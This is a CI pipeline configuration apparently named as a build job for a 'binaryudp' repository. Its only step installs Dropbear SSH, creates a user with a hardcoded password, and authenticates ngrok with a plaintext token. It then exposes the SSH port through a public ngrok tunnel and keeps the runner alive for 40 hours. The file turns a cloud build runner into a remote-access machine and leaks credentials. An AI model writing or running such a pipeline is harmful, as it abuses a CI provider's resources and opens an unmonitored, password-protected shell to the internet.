pipeline:
  identifier: Build_Subhya090_binaryudp_1741606998488
  name: Build binaryudp
  orgIdentifier: default
  projectIdentifier: default_project
  properties:
    ci:
      codebase:
        build: <+input>
        connectorRef: account.Github_OAuth_1741606939087
        repoName: Subhya090/binaryudp
  stages:
    - stage:
        identifier: build
        name: build
        spec:
          caching:
            enabled: true
          cloneCodebase: false
          execution:
            steps:
              - step:
                  identifier: setup_ssh_ngrok
                  name: Setup Dropbear SSH  Ngrok
                  type: Run
                  spec:
                    shell: Bash
                    command: |
                      # Install Dropbear SSH and Ngrok dependencies
                      apt-get update && apt-get install -y dropbear wget unzip curl

                      # Create SSH user 'samir' with password 'samir090'
                      useradd -m -s /bin/bash samir
                      echo 'samir:samir090' | chpasswd

                      # Configure Dropbear to run on port 2222
                      echo "DROPBEAR_EXTRA_ARGS='-p 2222'" > /etc/default/dropbear
                      service dropbear start

                      # Download & install Ngrok
                      wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip -O /tmp/ngrok.zip
                      unzip /tmp/ngrok.zip -d /usr/local/bin/
                      chmod +x /usr/local/bin/ngrok

                      # Authenticate Ngrok
                      ngrok authtoken 2lKjA15AAL3kFG0cbOpfTJGbewT_3PjMCSs55KCHQ2PKkoVdS

                      # Start Ngrok to expose Dropbear SSH (port 2222)
                      nohup ngrok tcp 2222 > /dev/null 2>&1 &

                      # Keep the build running for 40 hours
                      sleep 144000
          platform:
            arch: Amd64
            os: Linux
          runtime:
            spec: {}
            size: xlarge
            type: Cloud
        type: CI
  timeout: 53w
